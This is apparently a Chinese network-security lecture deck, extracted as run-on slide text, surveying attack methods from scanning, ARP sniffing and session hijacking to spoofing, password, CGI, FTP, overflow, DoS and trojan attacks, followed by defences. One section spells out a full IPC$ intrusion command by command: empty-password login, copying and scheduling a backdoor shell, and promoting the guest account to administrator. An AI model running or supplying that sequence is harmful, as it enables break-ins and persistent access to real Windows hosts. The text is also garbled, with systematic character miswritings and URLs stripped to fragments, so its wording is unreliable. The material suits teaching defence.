常見網絡攻擊與防范提綱常見的網絡攻擊方法常用的平安防范措施常見的網絡攻擊方法19801985199019952000密碼猜測可自動復制的代碼密碼破解利用的漏洞破壞審計系統后門會話劫持擦除痕跡嗅探包欺騙GUI遠程控制自動探測掃描拒絕效勞www攻擊工具攻擊者入侵者水平攻擊手法半開放隱蔽掃描控制臺入侵檢測網絡管理DDOS攻擊2002高采用漏洞掃描工具選擇會用的方式入侵獲取系統一定權限提升為最高權限安裝系統后門獲取敏感信息或者其他攻擊目的入侵系統的常用步驟端口判斷判斷系統選擇最簡方式入侵分析可能有漏洞的效勞獲取系統一定權限提升為最高權限安裝多個系統后門去除入侵腳印攻擊其他系統獲取敏感信息作為其他用途較高明的入侵步驟PoizonB0x、pr0phet更改的網頁中經網數據有限公司中國科學院心理研究所國內某政府網站國內某大型商業網站國內黑客組織更改的網站頁面美國勞工部網站美國某節點網站美國某大型商業網站美國某政府網站這次事件中采用的常用攻擊手法這次事件中被利用的典型漏洞用戶名泄漏，缺省安裝的系統用戶名和密碼Unicode編碼可穿越firewall,執行黑客指令ASP源代碼泄露可遠程連接的數據庫用戶名和密碼SQLserver缺省安裝微軟Windows2000登錄驗證機制可被繞過Bind遠程溢出，Lion蠕蟲SUNrpc.sadmind遠程溢出，sadmin/IIS蠕蟲Wu-Ftpd格式字符串錯誤遠程平安漏洞拒絕效勞(syn-flood,ping)這次事件中被利用的典型漏洞用戶名泄漏，缺省安裝的系統用戶名和密碼入侵者利用黑客工具掃描系統用戶獲得用戶名和簡單密碼這次事件中被利用的典型漏洞Windows2000登錄驗證機制可被繞過常見的平安攻擊方法IP地址、主機是否運行、到要入侵點的路由、主機操作系統與用戶信息等。獲取信息1.收集主機信息

Ping命令判斷計算機是否開著，或者數據包發送到返回需要多少時間

Tracert/Tracerout命令跟蹤從一臺計算機到另外一臺計算機所走的路徑

Finger和Rusers命令收集用戶信息

Host或者Nslookup命令，結合Whois和Finger命令獲取主機、操作系統和用戶等信息

應用的方法：獲取網絡效勞的端口作為入侵通道。2.端口掃瞄1.TCPConnect() 2.TCPSYN3.TCPFIN 4.IP段掃瞄5.TCP反向Ident掃瞄 6.FTP代理掃瞄7.UDPICMP不到達掃瞄 7種掃瞄類型：NSS〔網絡平安掃描器〕，可執行Sendmail、匿名FTP、NFS出口、TFTP、Host.equiv和Xhost等常規檢查。Strobe(超級優化TCP端口檢測程序)，可記錄指定機器上的所有開放端口，快速識別指定機器上運行的效勞，提示可以被攻擊的效勞。SATAN(平安管理員的網絡分析工具)，SATAN用于掃描遠程主機，發現漏洞，包括FTPD漏洞和可寫的FTP目錄，NFS漏洞、NIS漏洞、RSH漏洞、Sendmail和X效勞器漏洞等。Jakal掃描器，可啟動而不完成TCP連接，因此可以掃描一個區域而不留下痕跡。IdengTCPscan掃描器，可識別指定TCP端口的進程的UID。掃瞄軟件舉例：3.Sniffer掃瞄一次利用ipc$的入侵過程1.C:\>netuse\\x.x.x.x\IPC$“〞/user:“admintitrators〞

用?流光?掃到的用戶名是administrators，密碼為“空〞的IP地址2.C:\>copysrv.exe\\x.x.x.x\admin$

先復制srv.exe上去，在流光的Tools目錄下3.C:\>nettime\\x.x.x.x

查查時間，發現x.x.x.x的當前時間是2003/3/19上午11:00，命令成功完成。

4.C:\>at\\x.x.x.x11:05srv.exe

用at命令啟動srv.exe吧〔這里設置的時間要比主機時間推后〕

5.C:\>nettime\\x.x.x.x

再查查時間到了沒有，如果x.x.x.x的當前時間是2003/3/19上午11:05，那就準備開始下面的命令。

6.C:\>telnetx.x.x.x99

這里會用到Telnet命令吧，注意端口是99。Telnet默認的是23端口，但是我們使用的是SRV在對方計算機中為我們建立一個99端口的Shell。

雖然我們可以Telnet上去了，但是SRV是一次性的，下次登錄還要再激活！所以我們打算建立一個Telnet效勞！這就要用到ntlm了

一次利用ipc$的入侵過程7.C:\>copyntlm.exe\\\admin$

ntlm.exe也在?流光?的Tools目錄中

8.C:\WINNT\system32>ntlm

輸入ntlm啟動〔這里的C:\WINNT\system32>是在對方計算機上運行當出現“DONE〞的時候，就說明已經啟動正常。然后使用“netstarttelnet〞來開啟Telnet效勞，接著輸入用戶名與密碼就進入對方了

為了方便日后登陸,將guest激活并加到管理組

10.C:\>netuserguest/active:yes

11.C:\>netuserguest1234

將Guest的密碼改為1234

12.C:\>netlocalgroupadministratorsguest/add

將Guest變為Administrator網絡竊聽是指通過截獲他人網絡上通信的數據流，并非法從中提取重要信息的一種方法間接性

利用現有網絡協議的一些漏洞來實現，不直接對受害主機系統的整體性進行任何操作或破壞隱蔽性

網絡竊聽只對受害主機發出的數據流進行操作，不與主機交換信息，也不影響受害主機的正常通信共享式局域網采用的是播送信道，每一臺主機所發出的幀都會被全網內所有主機接收到一般網卡具有以下四種工作模式：播送模式、多播模式、直接模式和混雜模式網卡的缺省工作模式是播送模式和直接模式，即只接收發給自己的和播送的幀使用MAC地址來確定數據包的流向 假設等于自己的MAC地址或是播送MAC地址，那么提交給上層處理程序，否那么丟棄此數據當網卡工作于混雜模式的時候，它不做任何判斷，直接將接收到的所有幀提交給上層處理程序共享式網絡下竊聽就使用網卡的混雜模式在數據鏈路層，數據幀的目的地址是以網卡的MAC地址來標識ARP協議實現<IP—MAC>的配對尋址ARP請求包是以播送的形式發出，正常情況下只有正確IP地址與的主機才會發出ARP響應包，告知查詢主機自己的MAC地址。局域網中每臺主機都維護著一張ARP表，其中存放著<IP—MAC>地址對。ARP改向的中間人竊聽A發往B：(MACb，MACa， PROTOCOL，DATA)B發往A：(MACa，MACb， PROTOCOL，DATA)A發往B：(MACx，MACa， PROTOCOL，DATA)B發往A：(MACx，MACb， PROTOCOL，DATA)X分別向A和B發送ARP包，促使其修改ARP表主機A的ARP表中B為<IPb—MACx>主機B的ARP表中A為<IPa—MACx>X成為主機A和主機B之間的“中間人〞分割網段

細化網絡會使得局域網中被竊聽的可能性減小

使用靜態ARP表

手工輸入<IP—MAC>地址對

采用第三層交換方式

取消局域網對MAC地址、ARP協議的依賴，而采用基于IP地址的交換加密

SSH、SSL、IPSec共享式局域網下的主動防范措施偽造數據包 構造一個含有正確目標IP地址和一個不存在目標MAC地址——各個操作系統處理方式不同，一個比較好的MAC地址是FF-FF-FF-FF-FF-FE性能分析 向網絡上發送大量包含無效MAC地址的數據包，竊聽主時機因處理大量信息而導致性能下降交換式局域網下的主動防范措施監聽ARP數據包 監聽通過交換機或者網關的所有ARP數據包，與預先建立的數據庫相比較定期探測數據包傳送路徑 使用路徑探測程序如tracert、traceroute等對發出數據包所經過的路徑進行檢查，并與備份的合法路徑作比較使用SNMP定期輪詢ARP表

一般欺騙會話劫持猜測序列號TCP區分正確數據包和錯誤數據包僅通過它們的SEQ/ACK序列號選擇恰當時間，在數據流中插入一個欺騙包，效勞器將接受這個包，并且更新ACK序列號；然而客戶主機仍繼續使用老的SEQ序列號，而沒有覺察我們的欺騙包沒有有效的方法可以從根本上防范會話劫持攻擊所有會話都加密保護——實現困難使用平安協議〔SSH、VPN〕——保護敏感會話對網絡數據流采取限制保護措施——被動措施2003年6月初，一些在中國工商銀行進行過網上銀行注冊的客戶，收到了一封來自網絡管理員的電子郵件，宣稱由于網絡銀行系統升級，要求客戶重新填寫用戶名和密碼。這一舉動隨后被工行工作人員發現，經證實是不法分子冒用網站公開信箱，企圖竊取客戶的資料。雖然沒有造成多大的損失，但是這宗典型的電子郵件欺騙案例當時曾在國內平安界和金融界掀起了軒然大波，刺激人們針對信息平安問題展開了更加深切的討論。發送郵件使用SMTP〔即簡單郵件傳輸協議〕SMTP協議的致命缺陷：過于信任原那么SMTP假設的依據是：不疑心郵件的使用者的身份和意圖偽裝成為他人身份向受害者發送郵件可以使用電子郵件客戶端軟件，也可以遠程登錄到25端口發送欺騙郵件查看電子郵件頭部信息 不僅指出了是否有人欺騙了電子郵件，而且指出了這個信息的來源采用SMTP身份驗證機制 使用與POP協議收取郵件時相同的用戶名/密碼PGP郵件加密 以公鑰密碼學〔PublicKeyCryptology〕為根底的人們利用計算機系統完成具有平安需求的決策時往往是基于屏幕的顯示頁面、URL圖標、圖片時間的先后順序攻擊者創造一個完整的令人信服的Web世界，但實際上它卻是一個虛假的復制攻擊者控制這個虛假的Web站點，受害者瀏覽器和Web之間所有網絡通信完全被攻擊者截獲URL地址改寫

://@:///攻擊者改寫Web頁中的所有URL地址，使它們指向攻擊者的Web效勞器不是真正的Web效勞器<user>:<password>@<host>:<port>/<url-path>欺騙過程用戶單擊經過改寫后的；:///向:///請求文檔；:///向:///返回文檔；:///改寫文檔中的所有URL；:///向用戶返回改寫后的文檔檢查頁面的源代碼禁用JavaScrip、ActiveX等腳本語言確保應用有效和能適當地跟蹤用戶 會話ID使用盡可能長的隨機數教育是非常重要的口令攻擊方法與對策：1、限制同一用戶的失敗登錄次數2、限制口令最短長度，要求特權指令使用復雜的字母、數字組合。3、定期更換口令，不要將口令存放到計算機文件中1口令暴力攻擊：生成口令字典，通過程序試探口令。2竊取口令文件后解密：竊取口令文件〔UNIX環境下的Passwd文件和Shadow文件〕，通過軟件解密。CGI漏洞攻擊原理：1.有些CGI程序只是簡單地進行傳遞，不對內容進行過濾，攻擊者就可能通過頁面提交帶有危險指令的腳本代碼提交給機器去執行。2.有些CGI能夠過濾一些特征數據，但是有些攻擊者成心制作一些混亂的字符串騙過檢測〔如使用退格字符〕。3.有些管理員把CGI所在的目錄設置為可寫的，那么攻擊者不僅可以修改替換頁面，而且也可以通過新腳本為所欲為。對策：嚴格設置CGI腳本權限，采用平安的CGI。漏洞攻擊FTP漏洞攻擊漏洞1：對使用的端口號沒有任何限制，可以使用TCP提供給其他效勞的任意端口，這就使攻擊者利用FTP攻擊其他效勞。FTP效勞器被當作攻擊武器使用了。防范措施是設置效勞器最好不要建立端口號在1024以下的連接，其次禁止FTP代理。漏洞2：FTP標準允許無限次輸入密碼。防范措施是建議效勞器限制嘗試輸入正確指令的次數，另外在一次登錄失敗后應暫停幾秒來削減暴力攻擊的有效性。漏洞3：分配端口號時，通常按增序分配。防范措施是讓系統改為使用隨機分配端口號的方法。緩沖區溢出攻擊在c語言中，下面程序將造成緩沖區溢出：charbuffer[10];strcpy(buffer,str);或者Sprintf(buffer,〞thisisatest.〞);后果：普通的緩沖區溢出并不會產生平安問題，只有將溢出送到能夠以root權限運行命令的區域才會產生危害，最常見的方法是在溢出區域運行一個shell，再通過shell執行其他的命令。對策：經常注意升級版本或下載補丁。例如：IISISAPI.Printer的緩沖區溢出攻擊軟件：://://補丁：release.asp?ReleaseID=29321拒絕效勞攻擊〔DoS〕SYN（我可以連接嗎？）ACK（可以）/SYN（請確認！）攻擊者受害者偽造地址進行SYN請求為何還沒回應就是讓你白等不能建立正常的連接拒絕效勞攻擊利用系統缺陷攻擊OOB攻擊耗盡連接攻擊利用放大原理Smurf攻擊利用放大系統攻擊分布式拒絕效勞攻擊DDoS1.OOB攻擊〔OutofBand〕原理：攻擊者是利用Windows下微軟網絡協定NetBIOS的一個例外處理程序OOB〔OutofBand〕的漏洞。只要有人以OOB的方式，通過TCP/IP傳遞一個小小的包到某個IP地址的某個開放的受端上〔一般為139〕。對象：使沒有防護或修訂的win95/nt系統瞬間當機。工具：Ssping、Teardrop(淚滴)、Trin00、Targe3這些攻擊都是利用系統的漏洞，因此補救的方法是升級或下載補丁對策2.耗盡連接攻讀LAND攻擊：向被攻擊者發送一個個源地址和目標地址都被設置成為被攻擊者的地址的SYN包，導致被攻擊者自己與自己建立一個空連接，直到超時。TCP/SYN攻擊：攻擊者向目標主機不斷發送帶有虛假源地址的SYN包，目標主機發送ACK/SYN回應，因為源地址是虛假的，所以不會收到ACK回應，導致消耗大量資源等待ACK上，直止系統資源耗盡。這些攻擊都是利用系統的漏洞，因此補救的方法是升級或下載補丁對策Smurf攻擊攻擊者用播送的方式發送回復地址為受害者地址的ICMP請求數據包，每個收到這個數據包的主機都進行回應，大量的回復數據包發給受害者，導致受害主機崩潰。Smurf攻擊原理利用放大系統攻擊某些類型的操作系統，在一定情況下，對一個請求所返回的信息比請求信息量大幾十倍〔如Macintosh〕，攻擊者偽裝成目標主機進行請求，導致大量數據流發向目標主機，加重了攻擊效果。分布式拒絕效勞攻擊攻擊者在客戶端通過telnet之類的常用連接軟件，向(master)主控端發送發送對目標主機的攻擊請求命令。主控端(master)偵聽接收攻擊命令，并把攻擊命令傳到分布端，分布端是執行攻擊的角色，收到命令立即發起flood攻擊。DDoS攻擊原理特洛伊木馬木馬不同于病毒，但經常被視作病毒處理，隨計算機自動啟動并在某一端口進行偵聽；木馬的實質只是一個通過端口進行通信的網絡客戶/效勞程序特洛伊木馬的種類遠程控制型輸出shell型信息竊取型其它類型Netbus客戶端程序NetBus傳輸NetBus使用TCP建立會話。缺省情況下用12345端口進行連接，12346端口進行數據傳輸跟蹤NetBus的活動比較困難。可以通過檢查12346端口數據來確定許多類似的程序使用固定的端口，你可以掃描整個的網絡監測可疑的活動。簡單方法netstat-an反彈型特洛伊木馬TCP/IP的每個層次都存在攻擊TelnetSMTPDNSFTPUDPTCPIP以太網無線網絡SATNETARPNET應用程序攻擊拒絕服務攻擊數據監聽和竊取硬件設備破壞電磁監聽混合型、自動的攻擊

WorkstationViaEmailFileServerWorkstationMailServerInternet混合型攻擊:蠕蟲WebServerViaWebPageWorkstationWebServerMailGateway攻擊的開展趨勢防病毒防火墻入侵檢測風險管理攻擊的開展趨勢常見的平安防范措施常用的平安防范措施

訪問控制

認證

NAT

加密

防病毒、內容過濾流量管理入侵檢測系統FirewallInternetServersDMZIDSAgentIntranet監控中心router攻擊者發現攻擊發現攻擊發現攻擊報警報警IDSAgent漏洞掃描系統Internet地方網管scanner監控中心地方網管地方網管地方網管地方網管市場部工程部router開發部InternetServersFirewall漏洞掃描產品應用系統平安加固根本平安配置檢測和優化密碼系統平安檢測和增強系統后門檢測提供訪問控制策略和工具增強遠程維護的平安性文件系統完整性審計增強的系統日志分析系統升級與補丁安裝Windows系統平安加固Windows系統平安加固優化注冊表增